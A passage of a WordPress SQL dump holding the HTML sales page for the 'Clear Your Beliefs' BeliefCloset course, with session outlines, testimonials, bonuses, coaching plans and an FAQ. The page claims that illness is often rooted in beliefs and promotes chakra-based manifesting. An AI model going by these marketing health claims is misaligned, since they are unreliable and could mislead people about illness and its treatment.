size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:05:18', '2014-06-19 07:05:18', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1047, 2, '2014-06-19 02:04:14', '2014-06-19 07:04:14', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. 